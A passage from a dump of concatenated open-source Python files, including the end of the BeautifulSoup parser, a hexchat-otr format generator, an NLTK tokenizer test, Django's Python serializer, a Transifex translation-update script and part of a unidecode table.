self._toStringSubclass(data, Declaration)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as a CData object."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
data = self.rawdata[i+9:k]
j = k+3
self._toStringSubclass(data, CData)
else:
try:
j = SGMLParser.parse_declaration(self, i)
except SGMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
Most tags can't be nested at all. For instance, the occurance of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
Some tags can be nested arbitrarily. For instance, the occurance
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup, MinimalSoup, or
BeautifulStoneSoup before writing your own subclass."""
def __init__(self, *args, **kwargs):
if not kwargs.has_key('smartQuotesTo'):
kwargs['smartQuotesTo'] = self.HTML_ENTITIES
BeautifulStoneSoup.__init__(self, *args, **kwargs)
SELF_CLOSING_TAGS = buildTagMap(None,
['br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base'])
QUOTE_TAGS = {'script': None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center']
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
'thead' : ['table'],
'tbody' : ['table'],
'tfoot' : ['table'],
}
NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
# Used to detect the charset in a META tag; see start_meta
CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)")
def start_meta(self, attrs):
"""Beautiful Soup can detect a charset included in a META tag,
try to convert the document to that charset, and re-parse the
document from the beginning."""
httpEquiv = None
contentType = None
contentTypeIndex = None
tagNeedsEncodingSubstitution = False
for i in range(0, len(attrs)):
key, value = attrs[i]
key = key.lower()
if key == 'http-equiv':
httpEquiv = value
elif key == 'content':
contentType = value
contentTypeIndex = i
if httpEquiv and contentType: # It's an interesting meta tag.
match = self.CHARSET_RE.search(contentType)
if match:
if getattr(self, 'declaredHTMLEncoding') or \
(self.originalEncoding == self.fromEncoding):
# This is our second pass through the document, or
# else an encoding was specified explicitly and it
# worked. Rewrite the meta tag.
newAttr = self.CHARSET_RE.sub\
(lambda(match):match.group(1) +
"%SOUP-ENCODING%", value)
attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
newAttr)
tagNeedsEncodingSubstitution = True
else:
# This is our first pass through the document.
# Go through it again with the new information.
newCharset = match.group(3)
if newCharset and newCharset != self.originalEncoding:
self.declaredHTMLEncoding = newCharset
self._feed(self.declaredHTMLEncoding)
raise StopParsing
tag = self.unknown_starttag("meta", attrs)
if tag and tagNeedsEncodingSubstitution:
tag.containsSubstitutions = True
class StopParsing(Exception):
pass
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
"""The BeautifulSoup class is oriented towards skipping over
common HTML errors like unclosed tags. However, sometimes it makes
errors of its own. For instance, consider this fragment:
<b>Foo<b>Bar</b></b>
This is perfectly valid (if bizarre) HTML. However, the
BeautifulSoup class will implicitly close the first b tag when it
encounters the second 'b'. It will think the author wrote
"<b>Foo<b>Bar", and didn't close the first 'b' tag, because
there's no real-world reason to bold something that's already
bold. When it encounters '</b></b>' it will close two more 'b'
tags, for a grand total of three tags closed instead of two. This
can throw off the rest of your document structure. The same is
true of a number of other tags, listed below.
It's much more common for someone to forget to close a 'b' tag
than to actually use nested 'b' tags, and the BeautifulSoup class
handles the common case. This class handles the not-co-common
case: where you can't believe someone wrote what they did, but
it's valid HTML and BeautifulSoup screwed up by assuming it
wouldn't be."""
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
'big']
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class MinimalSoup(BeautifulSoup):
"""The MinimalSoup class is for parsing HTML that contains
pathologically bad markup. It makes no assumptions about tag
nesting, but it does know which tags are self-closing, that
<script> tags contain Javascript and should not be parsed, that
META tags may contain encoding information, and so on.
This also makes it better for subclassing than BeautifulStoneSoup
or BeautifulSoup."""
RESET_NESTING_TAGS = buildTagMap('noscript')
NESTABLE_TAGS = {}
class BeautifulSOAP(BeautifulStoneSoup):
"""This class will push a tag with only a single string child into
the tag's parent as an attribute. The attribute's name is the tag
name, and the value is the string child. An example should give
the flavor of the change:
<foo><bar>baz</bar></foo>
=>
<foo bar="baz"><bar>baz</bar></foo>
You can then access fooTag['bar'] instead of fooTag.barTag.string.
This is, of course, useful for scraping structures that tend to
use subelements instead of attributes, such as SOAP messages. Note
that it modifies its input, so don't print the modified version
out.
I'm not sure how many people really want to use this class; let me
know if you do. Mainly I like the name."""
def popTag(self):
if len(self.tagStack) > 1:
tag = self.tagStack[-1]
parent = self.tagStack[-2]
parent._getAttrMap()
if (isinstance(tag, Tag) and len(tag.contents) == 1 and
isinstance(tag.contents[0], NavigableString) and
not parent.attrMap.has_key(tag.name)):
parent[tag.name] = tag.contents[0]
BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisness,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
pass
class RobustHTMLParser(BeautifulSoup):
pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
pass
class RobustInsanelyWackAssHTMLParser(MinimalSoup):
pass
class SimplifyingSOAPParser(BeautifulSOAP):
pass
######################################################
#
# Bonus library: Unicode, Dammit
#
# This class forces XML data into a standard format (usually to UTF-8
# or Unicode). It is heavily based on code from Mark Pilgrim's
# Universal Feed Parser. It does not rewrite the XML or HTML to
# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
# (XML) and BeautifulSoup.start_meta (HTML).
# Autodetects character encodings.
# Download from http://chardet.feedparser.org/
try:
import chardet
# import chardet.constants
# chardet.constants._debug = 1
except:
chardet = None
chardet = None
# cjkcodecs and iconv_codec make Python know about more character encodings.
# Both are available from http://cjkpython.i18n.org/
# They're built in if you use Python 2.4.
try:
import cjkcodecs.aliases
except:
pass
try:
import iconv_codec
except:
pass
class UnicodeDammit:
"""A class for detecting the encoding of a *ML document and
converting it to a Unicode string. If the source encoding is
windows-1252, can replace MS smart quotes with their HTML or XML
equivalents."""
# This dictionary maps commonly seen values for "charset" in HTML
# meta tags to the corresponding Python codec names. It only covers
# values that aren't in Python's aliases and can't be determined
# by the heuristics in find_codec.
CHARSET_ALIASES = { "macintosh" : "mac-roman",
"x-sjis" : "shift-jis" }
def __init__(self, markup, overrideEncodings=[],
smartQuotesTo='xml'):
self.markup, documentEncoding, sniffedEncoding = \
self._detectEncoding(markup)
self.smartQuotesTo = smartQuotesTo
self.triedEncodings = []
if markup == '' or isinstance(markup, unicode):
self.originalEncoding = None
self.unicode = unicode(markup)
return
u = None
for proposedEncoding in overrideEncodings:
u = self._convertFrom(proposedEncoding)
if u: break
if not u:
for proposedEncoding in (documentEncoding, sniffedEncoding):
u = self._convertFrom(proposedEncoding)
if u: break
# If no luck and we have auto-detection library, try that:
if not u and chardet and not isinstance(self.markup, unicode):
u = self._convertFrom(chardet.detect(self.markup)['encoding'])
# As a last resort, try utf-8 and windows-1252:
if not u:
for proposed_encoding in ("utf-8", "windows-1252"):
u = self._convertFrom(proposed_encoding)
if u: break
self.unicode = u
if not u: self.originalEncoding = None
def _subMSChar(self, orig):
"""Changes a MS smart quote character to an XML or HTML
entity."""
sub = self.MS_CHARS.get(orig)
if type(sub) == types.TupleType:
if self.smartQuotesTo == 'xml':
sub = '&#x%s;' % sub[1]
else:
sub = '&%s;' % sub[0]
return sub
def _convertFrom(self, proposed):
proposed = self.find_codec(proposed)
if not proposed or proposed in self.triedEncodings:
return None
self.triedEncodings.append(proposed)
markup = self.markup
# Convert smart quotes to HTML if coming from an encoding
# that might have them.
if self.smartQuotesTo and proposed.lower() in("windows-1252",
"iso-8859-1",
"iso-8859-2"):
markup = re.compile("([\x80-\x9f])").sub \
(lambda(x): self._subMSChar(x.group(1)),
markup)
try:
# print "Trying to convert document to %s" % proposed
u = self._toUnicode(markup, proposed)
self.markup = u
self.originalEncoding = proposed
except Exception, e:
# print "That didn't work!"
# print e
return None
#print "Correct encoding: %s" % proposed
return self.markup
def _toUnicode(self, data, encoding):
'''Given a string and its encoding, decodes the string into Unicode.
%encoding is a string recognized by encodings.aliases'''
# strip Byte Order Mark (if present)
if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16be'
data = data[2:]
elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16le'
data = data[2:]
elif data[:3] == '\xef\xbb\xbf':
encoding = 'utf-8'
data = data[3:]
elif data[:4] == '\x00\x00\xfe\xff':
encoding = 'utf-32be'
data = data[4:]
elif data[:4] == '\xff\xfe\x00\x00':
encoding = 'utf-32le'
data = data[4:]
newdata = unicode(data, encoding)
return newdata
def _detectEncoding(self, xml_data):
"""Given a document, tries to detect its XML encoding."""
xml_encoding = sniffed_xml_encoding = None
try:
if xml_data[:4] == '\x4c\x6f\xa7\x94':
# EBCDIC
xml_data = self._ebcdic_to_ascii(xml_data)
elif xml_data[:4] == '\x00\x3c\x00\x3f':
# UTF-16BE
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
and (xml_data[2:4] != '\x00\x00'):
# UTF-16BE with BOM
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x3f\x00':
# UTF-16LE
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
(xml_data[2:4] != '\x00\x00'):
# UTF-16LE with BOM
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\x00\x3c':
# UTF-32BE
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x00\x00':
# UTF-32LE
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\xfe\xff':
# UTF-32BE with BOM
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\xff\xfe\x00\x00':
# UTF-32LE with BOM
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
elif xml_data[:3] == '\xef\xbb\xbf':
# UTF-8 with BOM
sniffed_xml_encoding = 'utf-8'
xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
else:
sniffed_xml_encoding = 'ascii'
pass
xml_encoding_match = re.compile \
('^<\?.*encoding=[\'"](.*?)[\'"].*\?>')\
.match(xml_data)
except:
xml_encoding_match = None
if xml_encoding_match:
xml_encoding = xml_encoding_match.groups()[0].lower()
if sniffed_xml_encoding and \
(xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
'iso-10646-ucs-4', 'ucs-4', 'csucs4',
'utf-16', 'utf-32', 'utf_16', 'utf_32',
'utf16', 'u16')):
xml_encoding = sniffed_xml_encoding
return xml_data, xml_encoding, sniffed_xml_encoding
def find_codec(self, charset):
return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
or (charset and self._codec(charset.replace("-", ""))) \
or (charset and self._codec(charset.replace("-", "_"))) \
or charset
def _codec(self, charset):
if not charset: return charset
codec = None
try:
codecs.lookup(charset)
codec = charset
except LookupError:
pass
return codec
EBCDIC_TO_ASCII_MAP = None
def _ebcdic_to_ascii(self, s):
c = self.__class__
if not c.EBCDIC_TO_ASCII_MAP:
emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
201,202,106,107,108,109,110,111,112,113,114,203,204,205,
206,207,208,209,126,115,116,117,118,119,120,121,122,210,
211,212,213,214,215,216,217,218,219,220,221,222,223,224,
225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
250,251,252,253,254,255)
import string
c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
''.join(map(chr, range(256))), ''.join(map(chr, emap)))
return s.translate(c.EBCDIC_TO_ASCII_MAP)
MS_CHARS = { '\x80' : ('euro', '20AC'),
'\x81' : ' ',
'\x82' : ('sbquo', '201A'),
'\x83' : ('fnof', '192'),
'\x84' : ('bdquo', '201E'),
'\x85' : ('hellip', '2026'),
'\x86' : ('dagger', '2020'),
'\x87' : ('Dagger', '2021'),
'\x88' : ('circ', '2C6'),
'\x89' : ('permil', '2030'),
'\x8A' : ('Scaron', '160'),
'\x8B' : ('lsaquo', '2039'),
'\x8C' : ('OElig', '152'),
'\x8D' : '?',
'\x8E' : ('#x17D', '17D'),
'\x8F' : '?',
'\x90' : '?',
'\x91' : ('lsquo', '2018'),
'\x92' : ('rsquo', '2019'),
'\x93' : ('ldquo', '201C'),
'\x94' : ('rdquo', '201D'),
'\x95' : ('bull', '2022'),
'\x96' : ('ndash', '2013'),
'\x97' : ('mdash', '2014'),
'\x98' : ('tilde', '2DC'),
'\x99' : ('trade', '2122'),
'\x9a' : ('scaron', '161'),
'\x9b' : ('rsaquo', '203A'),
'\x9c' : ('oelig', '153'),
'\x9d' : '?',
'\x9e' : ('#x17E', '17E'),
'\x9f' : ('Yuml', ''),}
#######################################################################
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin.read())
print soup.prettify()
|
TingPing/hexchat-otr
|
refs/heads/master
|
src/makeformats.py
|
1
|
#!/usr/bin/env python3
#
# Uli Meis <a.sporto+bee@gmail.com>
#
# Just a short script to generate our FORMAT_REC
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,USA
import sys,os,re
GPL_LICENSE = """
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,USA
*/
"""
lines = map(lambda x: x.strip(),open(sys.argv[1],"r").readlines())
out_dir = sys.argv[2] if len(sys.argv) > 2 else "."
hdr = open(os.path.join(out_dir, "otr-formats.h"), "w")
srcx = open(os.path.join(out_dir, "hexchat-formats.c"), "w")
srcx.write(GPL_LICENSE)
hdr.write(GPL_LICENSE)
srcx.write('#include "otr.h"\n')
srcx.write('FORMAT_REC formats[] = {\n\t')
srcx.write('{ MODULE_NAME, "otr" }')
hdr.write("enum\n{\n\t")
hdr.write("TXT_OTR_MODULE_NAME")
fills = 0
section = None
for line in lines:
srcx.write(",\n\t")
e = line.split("\t")
if len(e)==1:
# Section name
section = e[0]
srcx.write("""{ NULL, "%s" }""" % (e[0]))
hdr.write(",\n\tTXT_OTR_FILL_%d" % fills)
fills += 1
continue
params = []
fo = e[1]
new = ""
last=0
i=0
srcx.write("""{ "%s", "%s" """ % (e[0],fo.replace("%%9","").replace("%9","").replace("%g","").replace("%n","")))
for m in re.finditer("(^|[^%])%([0-9]*)[ds]",fo):
if m.group()[-1]=='d':
params += ['1']
else:
params += ['0']
new += fo[last:m.start()+len(m.group(1))].replace('%%','%')+"$"
if m.group(2): new+= "[%s]" % m.group(2)
new += "%d" % i
last = m.end()
i += 1
new += fo[last:].replace('%%','%')
e[1] = new
e += [len(params)] + params
#print "Handling line %s with elen %d" % (line,len(e))
premsg = ""
if e[1][0] != "{" and section!="Nickignore" and section!="Contexts":
premsg = "%9OTR%9: "
srcx.write("}")
hdr.write(",\n\t")
hdr.write("TXT_%s" % e[0].upper())
hdr.write("""
};
extern FORMAT_REC formats[];
""")
srcx.write(""",
\t{ NULL, NULL }
};
G_STATIC_ASSERT (G_N_ELEMENTS(formats) - 1 == TXT_ST_UNKNOWN + 1);
""")
hdr.close()
srcx.close()
|
boompieman/iim_project
|
refs/heads/master
|
project_python2/lib/python2.7/site-packages/nltk/test/unit/test_tokenize.py
|
4
|
# -*- coding: utf-8 -*-
"""
Unit tests for nltk.tokenize.
See also nltk/test/tokenize.doctest
"""
from __future__ import unicode_literals
from nltk.tokenize import TweetTokenizer
import unittest
class TestTokenize(unittest.TestCase):
def test_tweet_tokenizer(self):
"""
Test TweetTokenizer using words with special and accented characters.
"""
tokenizer = TweetTokenizer(strip_handles=True, reduce_len=True)
s9 = "@myke: Let's test these words: resumé España München français"
tokens = tokenizer.tokenize(s9)
expected = [':', "Let's", 'test', 'these', 'words', ':', 'resumé',
'España', 'München', 'français']
self.assertEqual(tokens, expected)
|
Serag8/Bachelor
|
refs/heads/master
|
google_appengine/lib/django-1.2/django/core/serializers/python.py
|
223
|
"""
A Python "serializer". Doesn't do much serializing per se -- just converts to
and from basic Python data types (lists, dicts, strings, etc.). Useful as a basis for
other serializers.
"""
from django.conf import settings
from django.core.serializers import base
from django.db import models, DEFAULT_DB_ALIAS
from django.utils.encoding import smart_unicode, is_protected_type
class Serializer(base.Serializer):
"""
Serializes a QuerySet to basic Python objects.
"""
internal_use_only = True
def start_serialization(self):
self._current = None
self.objects = []
def end_serialization(self):
pass
def start_object(self, obj):
self._current = {}
def end_object(self, obj):
self.objects.append({
"model" : smart_unicode(obj._meta),
"pk" : smart_unicode(obj._get_pk_val(), strings_only=True),
"fields" : self._current
})
self._current = None
def handle_field(self, obj, field):
value = field._get_val_from_obj(obj)
# Protected types (i.e., primitives like None, numbers, dates,
# and Decimals) are passed through as is. All other values are
# converted to string first.
if is_protected_type(value):
self._current[field.name] = value
else:
self._current[field.name] = field.value_to_string(obj)
def handle_fk_field(self, obj, field):
related = getattr(obj, field.name)
if related is not None:
if self.use_natural_keys and hasattr(related, 'natural_key'):
related = related.natural_key()
else:
if field.rel.field_name == related._meta.pk.name:
# Related to remote object via primary key
related = related._get_pk_val()
else:
# Related to remote object via other field
related = smart_unicode(getattr(related, field.rel.field_name), strings_only=True)
self._current[field.name] = related
def handle_m2m_field(self, obj, field):
if field.rel.through._meta.auto_created:
if self.use_natural_keys and hasattr(field.rel.to, 'natural_key'):
m2m_value = lambda value: value.natural_key()
else:
m2m_value = lambda value: smart_unicode(value._get_pk_val(), strings_only=True)
self._current[field.name] = [m2m_value(related)
for related in getattr(obj, field.name).iterator()]
def getvalue(self):
return self.objects
def Deserializer(object_list, **options):
"""
Deserialize simple Python objects back into Django ORM instances.
It's expected that you pass the Python objects themselves (instead of a
stream or a string) to the constructor
"""
db = options.pop('using', DEFAULT_DB_ALIAS)
models.get_apps()
for d in object_list:
# Look up the model and starting build a dict of data for it.
Model = _get_model(d["model"])
data = {Model._meta.pk.attname : Model._meta.pk.to_python(d["pk"])}
m2m_data = {}
# Handle each field
for (field_name, field_value) in d["fields"].iteritems():
if isinstance(field_value, str):
field_value = smart_unicode(field_value, options.get("encoding", settings.DEFAULT_CHARSET), strings_only=True)
field = Model._meta.get_field(field_name)
# Handle M2M relations
if field.rel and isinstance(field.rel, models.ManyToManyRel):
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
def m2m_convert(value):
if hasattr(value, '__iter__'):
return field.rel.to._default_manager.db_manager(db).get_by_natural_key(*value).pk
else:
return smart_unicode(field.rel.to._meta.pk.to_python(value))
else:
m2m_convert = lambda v: smart_unicode(field.rel.to._meta.pk.to_python(v))
m2m_data[field.name] = [m2m_convert(pk) for pk in field_value]
# Handle FK fields
elif field.rel and isinstance(field.rel, models.ManyToOneRel):
if field_value is not None:
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
if hasattr(field_value, '__iter__'):
obj = field.rel.to._default_manager.db_manager(db).get_by_natural_key(*field_value)
value = getattr(obj, field.rel.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.rel.to._meta.pk.rel:
value = value.pk
else:
value = field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
data[field.attname] = value
else:
data[field.attname] = field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
else:
data[field.attname] = None
# Handle all other fields
else:
data[field.name] = field.to_python(field_value)
yield base.DeserializedObject(Model(**data), m2m_data)
def _get_model(model_identifier):
"""
Helper to look up a model from an "app_label.module_name" string.
"""
try:
Model = models.get_model(*model_identifier.split("."))
except TypeError:
Model = None
if Model is None:
raise base.DeserializationError(u"Invalid model identifier: '%s'" % model_identifier)
return Model
|
moneta-project/moneta-2.0.1.0
|
refs/heads/master
|
contrib/devtools/update-translations.py
|
5
|
#!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'moneta_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
specifiers.append(s[percent+1])
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation '%s'" % sanitize_string(translation))
return False
else:
if source_f != translation_f:
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations()
|
AwesomeTurtle/personfinder
|
refs/heads/master
|
app/vendors/unidecode/x07b.py
|
252
|
data = (
'Mang ', # 0x00
'Zhu ', # 0x01
'Utsubo ', # 0x02
'Du ', # 0x03
'Ji ', # 0x04
'Xiao ', # 0x05
'Ba ', # 0x06
'Suan ', # 0x07
'Ji ', # 0x08
'Zhen ', # 0x09
'Zhao ', # 0x0a
'Sun ', # 0x0b
'Ya ', # 0x0c
